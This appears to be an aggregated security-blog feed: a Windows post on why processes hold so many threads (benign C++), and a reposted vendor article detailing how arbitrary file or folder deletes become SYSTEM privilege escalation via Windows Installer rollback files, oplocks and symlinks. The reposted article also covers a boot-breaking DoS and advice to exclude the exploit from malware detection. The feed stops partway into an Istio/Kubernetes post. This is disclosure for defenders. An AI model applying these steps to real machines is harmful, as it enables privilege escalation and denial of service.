21 March 2022 at 11:00
This blog post is not intended to be a “101” ARM firmware reverse-engineering tutorial or a guide to attacking a specific IoT device. The goal is to share our experience and, why not, perhaps save you some precious hours and headaches. Sum up: The first post dealt with some more theoretical aspects at a very low level; this one instead shows how we finally decrypted the kernel image. DO NOT PANIC - we will not be as long-winded as in the first post.

Threads, Threads, and More Threads

21 March 2022 at 11:00

Looking at a typical Windows system shows thousands of threads, with process numbers in the hundreds, even though the total CPU consumption is low, meaning most of these threads are doing nothing most of the time. I typically rant about it in my Windows Internals classes. Why so many threads?

Here is a snapshot of my Task Manager showing the total number of threads and processes:

Showing processes details and sorting by thread count looks something like this:

The System process clearly has many threads. These are kernel threads created by the kernel itself and by device drivers. These threads are always running in kernel mode. For this post, I’ll disregard the System process and focus on “normal” user-mode processes.

There are other kernel processes that we should ignore, such as Registry and Memory Compression. Registry has few threads, but Memory Compression has many. It’s not shown in Task Manager (by design), but is shown in other tools, such as Process Explorer. While I’m writing this post, it has 78 threads. We should probably skip that process as well, since it is “out of our control”.

Notice the large number of threads in processes running the images Explorer.exe, SearchIndexer.exe, Nvidia Web helper.exe, Outlook.exe, Powerpnt.exe and MsMpEng.exe. Let’s write some code to calculate the average number of threads in a process and the standard deviation:

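#include <windows.h>
#include <tlhelp32.h>
#include <algorithm>
#include <cassert>
#include <cmath>
#include <cstdio>
#include <vector>

float ComputeStdDev(std::vector<int> const& values, float& average) {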
	float total = 0;
	std::for_each(values.begin(), values.end(), 
		[&](int n) { total += n; });
	average = total / values.size();
	total = 0;
	std::for_each(values.begin(), values.end(), 
		[&](int n) { total += (n - average) * (n - average); });
	return std::sqrt(total / values.size());
}

int main() {
	auto hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	
	PROCESSENTRY32 pe;
	pe.dwSize = sizeof(pe);

	// skip the idle process
	::Process32First(hSnapshot, &pe);

	int processes = 0, threads = 0;
	std::vector<int> threads_per_process;
	threads_per_process.reserve(500);
	while (::Process32Next(hSnapshot, &pe)) {
		processes++;
		threads += pe.cntThreads;
		threads_per_process.push_back(pe.cntThreads);
	}
	::CloseHandle(hSnapshot);

	assert(processes == threads_per_process.size());

	printf("Process: %d Threads: %d\n", processes, threads);
	float average;
	auto sd = ComputeStdDev(threads_per_process, average);
	printf("Average threads/process: %.2f\n", average);
	printf("Std. Dev.: %.2f\n", sd);

	return 0;
}

The ComputeStdDev function computes the standard deviation and average of a vector of integers. The main function uses the ToolHelp API to enumerate processes in the system, which fortunately also provides the number of threads in each process (stored in the threads_per_process vector). If I run this (no processes removed just yet), this is what I get:

Process: 525 Threads: 7810
Average threads/process: 14.88
Std. Dev.: 23.38

Almost 15 threads per process, with little CPU consumption in my Task Manager. The standard deviation is more telling – it’s big compared to the average, which suggests that many processes are far from the average in their thread consumption. And since a negative thread count is not possible (even zero is almost impossible), the divergence is toward higher thread numbers.
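One way to check the skew is to compare the average with the median of the same data. The following is a minimal sketch in standard C++; Median is a hypothetical helper that is not part of the program above, and it could be called on threads_per_process right next to ComputeStdDev.

```cpp
#include <algorithm>
#include <cassert>
#include <vector>

// Hypothetical helper: median of the per-process thread counts.
// The vector is taken by value because nth_element reorders it.
double Median(std::vector<int> values) {
    assert(!values.empty());
    const auto mid = values.size() / 2;
    std::nth_element(values.begin(), values.begin() + mid, values.end());
    const double upper = values[mid];
    if (values.size() % 2 == 1)
        return upper;
    // Even count: average the two middle elements. After nth_element,
    // everything before `mid` is <= values[mid], so the lower middle
    // element is the maximum of that front half.
    const int lower = *std::max_element(values.begin(), values.begin() + mid);
    return (lower + upper) / 2.0;
}
```

If the median comes out well below the average, a small number of thread-heavy processes is pulling the average up.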

To be fair, let’s remove the System and Memory Compression processes from our calculations. Here are the changes to the while loop:

while (::Process32Next(hSnapshot, &pe)) {
	if (pe.th32ProcessID == 4 || _wcsicmp(pe.szExeFile, L"memory compression") == 0)
		continue;
//...

Here are the results:

Process: 521 Threads: 7412
Average threads/process: 14.23
Std. Dev.: 14.14

The standard deviation is definitely smaller, but still pretty big (close to the average), which does not invalidate the previous point. Some processes use lots of threads.

In an ideal world, the number of threads in a system would be the same as the number of logical processors – any more and threads might fight over processors, any less and you’re not using the full power of the machine. Obviously, each “normal” process must have at least one thread running whatever main function is available in the executable, so on my system 521 threads would be the minimum number of threads. Still – we have over 7000.
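To put a number on that gap, the thread count can be divided by the number of logical processors. This is a small sketch in standard C++; ThreadsPerProcessor and LogicalProcessors are hypothetical helper names, and std::thread::hardware_concurrency() is only a hint that may return 0.

```cpp
#include <cassert>
#include <thread>

// Threads per logical processor; anything above 1.0 means there are
// more threads than processors to run them.
double ThreadsPerProcessor(unsigned totalThreads, unsigned logicalProcessors) {
    assert(logicalProcessors > 0);
    return static_cast<double>(totalThreads) / logicalProcessors;
}

// hardware_concurrency() may return 0 when the count cannot be determined,
// so fall back to 1 to keep the ratio defined.
unsigned LogicalProcessors() {
    const unsigned n = std::thread::hardware_concurrency();
    return n == 0 ? 1 : n;
}
```

For the 7412 threads counted above, a machine with, say, 16 logical processors (an assumed figure, not my actual hardware) would come out at roughly 463 threads per processor.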

What are these threads doing, anyway? Let’s examine some processes. First, an Explorer.exe process. Here is the Threads tab shown in Process Explorer:

Thread list in Explorer.exe instance

93 threads. I’ve sorted the list by Start Address to get a sense of the common functions used. Let’s dig into some of them. One of the most common (in other processes as well) is ntdll!TppWorkerThread – this is a thread pool thread, likely waiting for work. Clicking the Stack button (or double clicking the entry in the list) shows the following call stack:

ntoskrnl.exe!KiSwapContext+0x76
ntoskrnl.exe!KiSwapThread+0x500
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeWaitForSingleObject+0x233
ntoskrnl.exe!KiSchedulerApc+0x3bd
ntoskrnl.exe!KiDeliverApc+0x2e9
ntoskrnl.exe!KiSwapThread+0x827
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeRemoveQueueEx+0x263
ntoskrnl.exe!IoRemoveIoCompletion+0x98
ntoskrnl.exe!NtWaitForWorkViaWorkerFactory+0x38e
ntoskrnl.exe!KiSystemServiceCopyEnd+0x25
ntdll.dll!ZwWaitForWorkViaWorkerFactory+0x14
ntdll.dll!TppWorkerThread+0x2f7
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

The system call NtWaitForWorkViaWorkerFactory is the one waiting for work (the name Worker Factory is the internal name of the thread pool type in the kernel, officially called TpWorkerFactory). The number of such threads is typically dynamic, growing and shrinking based on the amount of work provided to the thread pool(s). The minimum and maximum threads can be tweaked by APIs, but most processes are unlikely to do so.

Another function that appears a lot in the list is shcore.dll!_WrapperThreadProc. It looks like some generic function used by Explorer for its own threads. We can examine some call stacks to get a sense of what’s going on. Here is one:

ntoskrnl.exe!KiSwapContext+0x76
ntoskrnl.exe!KiSwapThread+0x500
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeWaitForSingleObject+0x233
ntoskrnl.exe!KiSchedulerApc+0x3bd
ntoskrnl.exe!KiDeliverApc+0x2e9
ntoskrnl.exe!KiSwapThread+0x827
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeWaitForSingleObject+0x233
ntoskrnl.exe!KeWaitForMultipleObjects+0x45b
win32kfull.sys!xxxRealSleepThread+0x362
win32kfull.sys!xxxSleepThread2+0xb5
win32kfull.sys!xxxRealInternalGetMessage+0xcfd
win32kfull.sys!NtUserGetMessage+0x92
win32k.sys!NtUserGetMessage+0x16
ntoskrnl.exe!KiSystemServiceCopyEnd+0x25
win32u.dll!NtUserGetMessage+0x14
USER32.dll!GetMessageW+0x2e
SHELL32.dll!_LocalServerThread+0x66
shcore.dll!_WrapperThreadProc+0xe9
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

This one seems to be waiting for UI messages, probably managing some user interface (GetMessage). We can verify with other tools. Here is my own WinSpy:

Apparently, I was wrong. This thread has the hidden window type used to receive messages targeting COM objects that live in this Single Threaded Apartment (STA).

We can inspect WinSpy some more to see the threads and windows created by Explorer. I’ll leave that to the interested reader.

Other generic call stacks start with ucrtbase.dll!thread_start+0x42. Many of them have the following call stack (kernel part trimmed for brevity):

ntdll.dll!ZwWaitForMultipleObjects+0x14
KERNELBASE.dll!WaitForMultipleObjectsEx+0xf0
KERNELBASE.dll!WaitForMultipleObjects+0xe
cdp.dll!shared::CallbackNotifierListener::ListenerInternal::StartInternal+0x9f
cdp.dll!std::thread::_Invoke<std::tuple<<lambda_10793e1829a048bb2f8cc95974633b56> >,0>+0x2f
ucrtbase.dll!thread_start<unsigned int (__cdecl*)(void *),1>+0x42
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

A function in CDP.dll is waiting for something (WaitForMultipleObjects). I count at least 12 threads doing just that. Perhaps all these waits could be consolidated to a smaller number of threads?
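As an illustration of what such consolidation could look like, here is a minimal sketch in portable C++ in which one waiting thread services any number of event sources. It says nothing about how CDP.dll works internally; WaitMultiplexer and its methods are hypothetical names. On Windows the thread pool wait APIs (such as CreateThreadpoolWait) serve a similar purpose.

```cpp
#include <cassert>
#include <condition_variable>
#include <cstddef>
#include <deque>
#include <functional>
#include <mutex>
#include <utility>
#include <vector>

// Hypothetical sketch: a single thread waits on behalf of many sources.
class WaitMultiplexer {
public:
    using Callback = std::function<void()>;

    // Registers an event source and returns its id.
    std::size_t Register(Callback cb) {
        std::lock_guard<std::mutex> lock(m_);
        callbacks_.push_back(std::move(cb));
        return callbacks_.size() - 1;
    }

    // Called from any thread when source `id` has something to report.
    void Signal(std::size_t id) {
        {
            std::lock_guard<std::mutex> lock(m_);
            assert(id < callbacks_.size());
            pending_.push_back(id);
        }
        cv_.notify_one();
    }

    // Asks Run() to return once all pending signals are dispatched.
    void Stop() {
        {
            std::lock_guard<std::mutex> lock(m_);
            stopped_ = true;
        }
        cv_.notify_one();
    }

    // Runs on the one waiting thread.
    void Run() {
        std::unique_lock<std::mutex> lock(m_);
        for (;;) {
            cv_.wait(lock, [this] { return stopped_ || !pending_.empty(); });
            if (pending_.empty())
                return;  // stopped, and nothing left to dispatch
            Callback cb = callbacks_[pending_.front()];
            pending_.pop_front();
            lock.unlock();
            cb();        // run the handler without holding the lock
            lock.lock();
        }
    }

private:
    std::mutex m_;
    std::condition_variable cv_;
    std::vector<Callback> callbacks_;
    std::deque<std::size_t> pending_;
    bool stopped_ = false;
};
```

With this shape, twelve listeners would cost one blocked thread instead of twelve, at the price of handlers running one after another on that thread.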

Let’s tackle a different process. Here is an instance of Teams.exe. My Teams is minimized to the tray and I have not interacted with it for a while:

Teams threads

62 threads. Many have the same CRT wrapper for a thread created by Teams. Here are several call stacks I observed:

ntdll.dll!ZwRemoveIoCompletion+0x14
KERNELBASE.dll!GetQueuedCompletionStatus+0x4f
skypert.dll!rtnet::internal::SingleThreadIOCP::iocpLoop+0x116
skypert.dll!SplOpaqueUpperLayerThread::run+0x84
skypert.dll!auf::priv::MRMWTransport::process1+0x6c
skypert.dll!auf::ThreadPoolExecutorImp::workLoop+0x160
skypert.dll!auf::tpImpThreadTrampoline+0x47
skypert.dll!spl::threadWinDispatch+0x19
skypert.dll!spl::threadWinEntry+0x17b
ucrtbase.dll!thread_start<unsigned int (__cdecl*)(void *),1>+0x42
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

ntdll.dll!ZwWaitForAlertByThreadId+0x14
ntdll.dll!RtlSleepConditionVariableCS+0x105
KERNELBASE.dll!SleepConditionVariableCS+0x29
Teams.exe!uv_cond_wait+0x10
Teams.exe!worker+0x8d
Teams.exe!uv__thread_start+0xa2
Teams.exe!thread_start<unsigned int (__cdecl*)(void *),1>+0x50
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

You can check more threads, but you get the idea. Most threads are waiting for something – this is not the ideal activity for a thread. A thread should run (useful) code.

Last example, Word:

57 threads. Word has been minimized for more than an hour now. The clearly common call stack looks like this:

ntdll.dll!ZwWaitForAlertByThreadId+0x14
ntdll.dll!RtlSleepConditionVariableSRW+0x131
KERNELBASE.dll!SleepConditionVariableSRW+0x29
v8jsi.dll!CrashForExceptionInNonABICompliantCodeRange+0x4092f6
v8jsi.dll!CrashForExceptionInNonABICompliantCodeRange+0x11ff2
v8jsi.dll!v8_inspector::V8StackTrace::topScriptIdAsInteger+0x43ad0
ucrtbase.dll!thread_start<unsigned int (__cdecl*)(void *),1>+0x42
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

v8jsi.dll is the React Native v8 engine – it’s creating many threads, most of which are doing nothing. I found it in Outlook and PowerPoint as well.

Many applications today depend on various libraries and frameworks, some of which don’t seem to care too much about using threads economically – examples include Node.js, the Electron framework, even Java and .NET. Threads are not free – there is the ETHREAD and related data structures in the kernel, stack in kernel space, and stack in user space. Context switches and code run by the kernel scheduler when threads change states from Running to Waiting, and from Waiting to Ready are not free, either.

Many desktop/laptop systems today are very powerful and it might seem everything is fine. I don’t think so. Developers use so many layers of abstraction these days, that we sometimes forget there are actual processors that execute the code, and need to use memory and other resources. None of that is free.

zodiacon

About

17 March 2022 at 00:00
Within the THALES group, the THALIUM team, based in Rennes, is dedicated to cyber operations, threat intelligence, vulnerability research, and the development of Red Team tools. We are hiring! Thalium, part of THALES group, is focused on threat intelligence, vulnerability research and red team development.

Abusing Arbitrary File Deletes to Escalate Privilege and Other Great Tricks

What do you do when you’ve found an arbitrary file delete as NT AUTHORITY\SYSTEM? Probably just sigh and call it a DoS. Well, no more. In this article, we’ll show you some great techniques for getting much more out of your arbitrary file deletes, arbitrary folder deletes, and other seemingly low-impact filesystem-based exploit primitives.

The Trouble with Arbitrary File Deletes

When you consider how to leverage an arbitrary file delete on Windows, two great obstacles present themselves:

  1. Most critical Windows OS files are locked down with DACLs that prevent modification even by SYSTEM. Instead, most OS files are owned by TrustedInstaller, and only that account has permission to modify them. (Exercise for the reader: Find the critical Windows OS files that can still be deleted or overwritten by SYSTEM!)
  2. Even if you find a file that you can delete as SYSTEM, it needs to be something that causes a “fail-open” (degradation of security) if deleted.

A third problem that can arise is that some critical system files are inaccessible at all times due to sharing violations.

Experience shows that finding a file to delete that meets all the above criteria is very hard. When looking in the usual places, which would be within C:\Windows, C:\Program Files or C:\ProgramData, we’re not aware of anything that fits the bill. There is some prior work that involves exploiting antivirus and other products, but this is dependent on vulnerable behavior in those products.

The Solution is Found Elsewhere: Windows Installer

In March of 2021, we received a vulnerability report from researcher Abdelhamid Naceri (halov). The vulnerability he reported was an arbitrary file delete in the User Profile service, running as SYSTEM. Remarkably, his submission also included a technique to parlay this file delete into an escalation of privilege (EoP), resulting in a command prompt running as SYSTEM. The EoP works by deleting a file, but not in any of the locations you would usually think of.

To understand the route to privilege escalation, we need to explain a bit about the operation of the Windows Installer service. The following explanation is simplified somewhat.

The Windows Installer service is responsible for performing installations of applications. An application author supplies an .msi file, which is a database defining the changes that must be made to install the application: folders to be created, files to be copied, registry keys to be modified, custom actions to be executed, and so forth.

To ensure that system integrity is maintained when an installation cannot be completed, and to make it possible to revert an installation cleanly, the Windows Installer service enforces transactionality. Each time it makes a change to the system, Windows Installer makes a record of the change, and each time it overwrites an existing file on the system with a newer version from the package being installed, it retains a copy of the older version. In case the install needs to be rolled back, these records allow the Windows Installer service to restore the system to its original state. In the simplest scenario, the location for these records is a folder named C:\Config.Msi.

During an installation, the Windows Installer service creates a folder named C:\Config.Msi and populates it with rollback information. Whenever the install process makes a change to the system, Windows Installer records the change in a file of type .rbs (rollback script) within C:\Config.Msi. Additionally, whenever the install overwrites an older version of some file with a newer version, Windows Installer will place a copy of the original file within C:\Config.Msi. This type of a file will be given the .rbf (rollback file) extension. In case an incomplete install needs to be rolled back, the service will read the .rbs and .rbf files and use them to revert the system to the state that existed before the install.
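The bookkeeping described above can be modeled in a few lines. This is a toy, in-memory sketch and not Windows Installer's actual format or code: FakeFs stands in for the file system, each RollbackRecord plays the role of an .rbs entry, and its backup field plays the role of an .rbf copy. All names are hypothetical.

```cpp
#include <cassert>
#include <map>
#include <string>
#include <vector>

using FakeFs = std::map<std::string, std::string>;  // path -> contents

// One journal entry: roughly what an .rbs record plus its .rbf copy hold.
struct RollbackRecord {
    std::string path;
    bool existed;        // did the path exist before the change?
    std::string backup;  // previous contents, if it existed
};

class ToyInstaller {
public:
    explicit ToyInstaller(FakeFs& fs) : fs_(fs) {}

    // Writes a file, first recording how to undo the change.
    void WriteFile(const std::string& path, const std::string& data) {
        RollbackRecord rec;
        rec.path = path;
        auto it = fs_.find(path);
        rec.existed = (it != fs_.end());
        if (rec.existed)
            rec.backup = it->second;
        journal_.push_back(rec);
        fs_[path] = data;
    }

    // Undoes all recorded changes, newest first.
    void Rollback() {
        for (auto r = journal_.rbegin(); r != journal_.rend(); ++r) {
            if (r->existed)
                fs_[r->path] = r->backup;  // restore the older version
            else
                fs_.erase(r->path);        // remove a newly created file
        }
        journal_.clear();
    }

private:
    FakeFs& fs_;
    std::vector<RollbackRecord> journal_;
};
```

Note that Rollback() trusts the journal completely: it writes whatever the records say to whatever path they name. Anyone able to rewrite the records therefore controls what rollback does, which is why the integrity of the real rollback folder matters so much.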

This mechanism must be protected against tampering. If a malicious user were able to alter the .rbs and/or .rbf files before they are read, arbitrary changes to the state of the system could occur during rollback. Therefore, Windows Installer sets a strong DACL on C:\Config.Msi and the enclosed files.

Here is where an opening arises, though: What if an attacker has an arbitrary folder delete vulnerability? They can use it to completely remove C:\Config.Msi immediately after Windows Installer creates it. The attacker can then recreate C:\Config.Msi with a weak DACL (note that ordinary users are allowed to create folders at the root of C:\). Once Windows Installer creates its rollback files within C:\Config.Msi, the attacker will be able to replace C:\Config.Msi with a fraudulent version that contains attacker-specified .rbs and .rbf files. Then, upon rollback, Windows Installer will make arbitrary changes to the system, as specified in the malicious rollback scripts.

Note that the only required exploit primitive here is the ability to delete an empty folder. Moving or renaming the folder works equally well.

From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP

In conjunction with this article, we are releasing source code for Abdelhamid Naceri’s privilege escalation technique. This exploit has wide applicability in cases where you have a primitive for deleting, moving, or renaming an arbitrary empty folder in the context of SYSTEM or an administrator. The exploit should be built in the Release configuration for either x64 or x86 to match the architecture of the target system. Upon running the exploit, it will prompt you to initiate a delete of C:\Config.Msi. You can do this by triggering an arbitrary folder delete vulnerability, or, for testing purposes, you can simply run rmdir C:\Config.Msi from an elevated command prompt. Upon a successful run, the exploit will drop a file to C:\Program Files\Common Files\microsoft shared\ink\HID.DLL. You can then get a SYSTEM command prompt by starting the On-Screen Keyboard osk.exe and then switching to the Secure Desktop, for example by pressing Ctrl-Alt-Delete.

The exploit contains an .msi file. The main thing that’s special about this .msi is that it contains two custom actions: one that produces a short delay, and a second that throws an error. When the Windows Installer service tries to install this .msi, the installation will halt midway and roll back. By the time the rollback begins, the exploit will have replaced the contents of C:\Config.Msi with a malicious .rbs and .rbf. The .rbf contains the bits of the malicious HID.DLL, and the .rbs instructs Windows Installer to “restore” it to our desired location (C:\Program Files\Common Files\microsoft shared\ink\).

The full mechanism of the EoP exploit is as follows:

  1. The EoP creates a dummy C:\Config.Msi and sets an oplock.
  2. The attacker triggers the folder delete vulnerability to delete C:\Config.Msi (or move C:\Config.Msi elsewhere) in the context of SYSTEM (or admin). Due to the oplock, the SYSTEM process is forced to wait.
  3. Within the EoP, the oplock callback is invoked. The following several steps take place within the callback.
  4. The EoP moves the dummy C:\Config.Msi elsewhere. This is done so that the oplock remains in place and the vulnerable process is forced to continue waiting, while the filesystem location C:\Config.Msi becomes available for other purposes (see further).
  5. The EoP spawns a new thread that invokes the Windows Installer service to install the .msi, with UI disabled.
  6. The callback thread of the EoP continues and begins polling for the existence of C:\Config.Msi. For reasons that are not clear to me, Windows Installer will create C:\Config.Msi, use it briefly for a temp file, delete it, and then create it a second time to use for rollback scripts. The callback thread polls C:\Config.Msi to wait for each of these actions to take place.
  7. As soon as the EoP detects that Windows Installer has created C:\Config.Msi for the second time, the callback thread exits, releasing the oplock. This allows the vulnerable process to proceed and delete (or move, or rename) the C:\Config.Msi created by Windows Installer.
  8. The EoP main thread resumes. It repeatedly attempts to create C:\Config.Msi with a weak DACL. As soon as the vulnerable process deletes (or moves, or renames) C:\Config.Msi, the EoP’s create operation succeeds.
  9. The EoP watches the contents of C:\Config.Msi and waits for Windows Installer to create an .rbs file there.
  10. The EoP repeatedly attempts to move C:\Config.Msi elsewhere. As soon as Windows Installer closes its handle to the .rbs, the move succeeds, and the EoP proceeds.
  11. The EoP creates C:\Config.Msi one final time. Within it, it places a malicious .rbs file having the same name as the original .rbs. Together with the .rbs, it writes a malicious .rbf.
  12. After the delay and the error action specified in the .msi, Windows Installer performs a rollback. It consumes the malicious .rbs and .rbf, dropping the DLL.

Note that at step 7, there is a race condition that sometimes causes problems. If the vulnerable process does not immediately awaken and delete C:\Config.Msi, the window of opportunity may be lost because Windows Installer will soon open a handle to C:\Config.Msi and begin writing an .rbs there. At that point, deleting C:\Config.Msi will no longer work, because it is not an empty folder. To avoid this, it is recommended to run the EoP on a system with a minimum of 4 processor cores. A quiet system, where not much other activity is taking place, is probably ideal. If you do experience a failure, it will be necessary to retry the EoP and trigger the vulnerability a second time.

From Arbitrary File Delete to SYSTEM EoP

The technique described above assumes a primitive that deletes an arbitrary empty folder. Often, though, one has a file delete primitive as opposed to a folder delete primitive. That was the case with Abdelhamid Naceri’s User Profile bug. To achieve SYSTEM EoP in this case, his exploit used one additional trick, which we will now explain.

In NTFS, the metadata (index data) associated with a folder is stored in an alternate data stream on that folder. If the folder is named C:\MyFolder, then the index data is found in a stream referred to as C:\MyFolder::$INDEX_ALLOCATION. Some implementation details can be found here. For our purposes, though, what we need to know is this: deleting the ::$INDEX_ALLOCATION stream of a folder effectively deletes the folder from the filesystem, and a stream name, such as C:\MyFolder::$INDEX_ALLOCATION, can be passed to APIs that expect the name of a file, including DeleteFileW.

So, if you are able to get a process running as SYSTEM or admin to pass an arbitrary string to DeleteFileW, then you can use it not only as a file delete primitive but also as a folder delete primitive. From there, you can get a SYSTEM EoP using the exploit technique discussed above. In our case, the string you want to pass is C:\Config.Msi::$INDEX_ALLOCATION.
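As a small illustration of the string involved, the sketch below formats the stream name for a given folder. The helper name toIndexAllocationStream is hypothetical and not part of the released exploit; it only builds a string and performs no filesystem operation.

```javascript
// Hypothetical helper: format the NTFS stream name that addresses a
// folder's index data. It only builds a string; nothing is deleted.
function toIndexAllocationStream(folderPath) {
  // Drop trailing backslashes so "C:\\Config.Msi\\" and "C:\\Config.Msi" agree.
  const trimmed = folderPath.replace(/\\+$/, "");
  return trimmed + "::$INDEX_ALLOCATION";
}

console.log(toIndexAllocationStream("C:\\Config.Msi"));
```

The resulting string is what the privileged process would need to hand to DeleteFileW for the folder delete to occur.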

Be advised that success depends on the particular code present in the vulnerable process. If the vulnerable process simply calls DeleteFileA/DeleteFileW, you should be fine. In other cases, though, the privileged process performs other associated actions, such as checking the attributes of the specified file. This is why you cannot test this scenario from the command prompt by running del C:\Config.Msi::$INDEX_ALLOCATION.

From Folder Contents Delete to SYSTEM EoP

Leveling up once more, let us suppose that the vulnerable SYSTEM process does not allow us to specify an arbitrary folder or file to be deleted, but we can get it to delete the contents of an arbitrary folder, or alternatively, to recursively delete files from an attacker-writable folder. Can this also be used for EoP? Researcher Abdelhamid Naceri demonstrated this as well, in a subsequent submission in July 2021. In this submission he detailed a vulnerability in the SilentCleanup scheduled task, running as SYSTEM. This task iterates over the contents of a temp folder and deletes each file it finds there. His technique was as follows:

  1. Create a subfolder, temp\folder1.
  2. Create a file, temp\folder1\file1.txt.
  3. Set an oplock on temp\folder1\file1.txt.
  4. Wait for the vulnerable process to enumerate the contents of temp\folder1 and try to delete the file file1.txt it finds there. This will trigger the oplock.
  5. When the oplock triggers, perform the following in the callback:
    a. Move file1.txt elsewhere, so that temp\folder1 is empty and can be deleted. We move file1.txt as opposed to just deleting it because deleting it would require us to first release the oplock. This way, we maintain the oplock so that the vulnerable process continues to wait, while we perform the next step.
    b. Recreate temp\folder1 as a junction to the \RPC Control folder of the object namespace.
    c. Create a symlink at \RPC Control\file1.txt pointing to C:\Config.Msi::$INDEX_ALLOCATION.
  6. When the callback completes, the oplock is released and the vulnerable process continues execution. The delete of file1.txt becomes a delete of C:\Config.Msi.
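The redirection in the steps above can be pictured with a toy model. The sketch below does not call any Windows API; the junctions and symlinks maps and the resolve function are illustrative stand-ins that only show how the same file name resolves to a different target once the folder has been swapped for a junction.

```javascript
// Toy model (not real Windows APIs): a tiny "namespace" with junctions and
// object-manager symlinks, used to show how the delete target changes.
const junctions = new Map(); // folder path -> target directory
const symlinks = new Map();  // object namespace path -> final target

// Resolve a path the way the model's privileged process would at open time.
function resolve(path) {
  const cut = path.lastIndexOf("\\");
  let dir = path.slice(0, cut);
  const name = path.slice(cut + 1);
  if (junctions.has(dir)) dir = junctions.get(dir);      // follow the junction
  const full = dir + "\\" + name;
  return symlinks.has(full) ? symlinks.get(full) : full; // follow the symlink
}

const victim = "temp\\folder1\\file1.txt";

// Steps 1-4: the file is real, so enumeration finds it and it resolves to itself.
const before = resolve(victim);

// Step 5 (inside the oplock callback): swap the folder for a junction and
// plant the symlink.
junctions.set("temp\\folder1", "\\RPC Control");
symlinks.set("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION");

// Step 6: the same name now resolves to the attacker's chosen target.
const after = resolve(victim);

console.log(before);
console.log(after);
```

The point of the model is the ordering: the name is discovered while it is still a real file, and only resolved again after the swap.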

Readers may recognize the symlink technique involving \RPC Control from James Forshaw’s symboliclink-testing-tools. Note, though, that it’s not sufficient to set up the junction from temp\folder1 to \RPC Control and then let the arbitrary file delete vulnerability do its thing. That’s because \RPC Control is not an enumerable file system location, so the vulnerable process would not be able to find \RPC Control\file1.txt via enumeration. Instead, we must start off by creating temp\folder1\file1.txt as a bona fide file, allowing the vulnerable process to find it through enumeration. Only afterward, just as the vulnerable process attempts to open the file for deletion, we turn temp\folder1 into a junction pointing into the object namespace.

For working exploit code, see project FolderContentsDeleteToFolderDelete. Note that the built-in malware detection in Windows will flag this process and shut it down. I recommend adding a “Process” exclusion for FolderContentsDeleteToFolderDelete.exe.

You can chain these two exploits together. To begin, run FolderOrFileDeleteToSystem and wait for it to prompt you to trigger privileged deletion of Config.Msi. Then, run FolderContentsDeleteToFolderDelete /target C:\Config.Msi. It will prompt you to trigger privileged deletion of the contents of C:\test1. If necessary for your exploit primitive, you can customize this location using the /initial command-line switch. For testing purposes, you can simulate the privileged folder contents deletion primitive by running del /q C:\test1\* from an elevated command prompt. FolderContentsDeleteToFolderDelete will turn this into a delete of C:\Config.Msi, and this will enable FolderOrFileDeleteToSystem to drop the HID.DLL. Finally, open the On-Screen Keyboard and hit Ctrl-Alt-Delete for your SYSTEM shell.

From Arbitrary Folder Create to Permanent DoS

Before closing, we’d like to share one more technique we learned from this same researcher. Suppose you have an exploit primitive for creating an arbitrary folder as SYSTEM or admin. Unless the folder is created with a weak DACL, it doesn’t sound like this would be something that could have any security impact at all. Surprisingly, though, it does: it can be used for a powerful denial of service. The trick is to create a folder such as this one:

      C:\Windows\System32\cng.sys

Normally there is no file or folder by that name. If an attacker name squats on that filesystem location with an extraneous file or even an empty folder, the Windows boot process is disrupted. The exact mechanism is a bit of a mystery. It would appear that Windows attempts to load the cng.sys kernel module from the improper location and fails, and there is no retry logic that allows it to continue and locate the proper driver. The result is a complete inability to boot the system. Other drivers can be used as well for the same effect.

Depending on the vulnerability at hand, this DoS exploit could even be a remote DoS, as nothing is required besides the ability to drop a single folder or file.

Conclusion

The techniques we’ve presented here show how some rather weak exploit primitives can be used for great effect. We have learned that:

• An arbitrary folder delete/move/rename (even of an empty folder), as SYSTEM or admin, can be used to escalate to SYSTEM.
• An arbitrary file delete, as SYSTEM or admin, can usually be used to escalate to SYSTEM.
• A delete of contents of an arbitrary folder, as SYSTEM or admin, can be used to escalate to SYSTEM.
• A recursive delete, as SYSTEM or admin, of contents of a fixed but attacker-writable folder (such as a temp folder), can be used to escalate to SYSTEM.
• An arbitrary folder create, as SYSTEM or admin, can be used for a permanent system denial-of-service.
• An arbitrary file delete or overwrite, as SYSTEM or admin, even if there is no control of contents, can be used for a permanent system denial-of-service.

We would like to thank researcher Abdelhamid Naceri for his great work in developing these exploit techniques, as well as for the vulnerabilities he has been reporting to our program. We look forward to seeing more from him in the future. Until then, you can find me on Twitter at @HexKitchen, and follow the team for the latest in exploit techniques and security patches.

Abusing Arbitrary File Deletes to Escalate Privilege and Other Great Tricks

Attacking Kubernetes via gateway-api

By: lazydog
17 March 2022 at 11:40

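Preface

A few days ago I noticed an official Istio security bulletin about a vulnerability (CVE-2022-21701) in which holding only the CREATE permission on the Kubernetes Gateway API is enough to escalate privileges. Reading the bulletin and diffing the patch did not reveal much, so I followed my intuition and guessed at an exploitation method. Tracing it through, I found that it involves how sidecar injection works and the way Deployments pass annotations along, which I found interesting enough to write up. There was one twist: after reproducing it, I found that this exploit chain also worked on the already-patched version, so I had a "friendly" exchange with the Istio security team, and it turned out that the joke was on me: the exploit I had imagined was just a feature that the official documentation mentions in passing.

So treat this whole post as a look at the attack surface of a controller, plus an introduction to some fun features.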

istio sidecar injection

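Istio can automatically inject a sidecar container into the pods running in a namespace by labeling that namespace. Another way is to manually add the sidecar.istio.io/inject: "true" annotation to the pod's annotations, and you can also use istioctl kube-inject to inject into the YAML by hand. The first two features rely on Kubernetes dynamic admission control, which allows users to modify and validate submitted resources at different stages.

Dynamic admission control flow: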

webhook

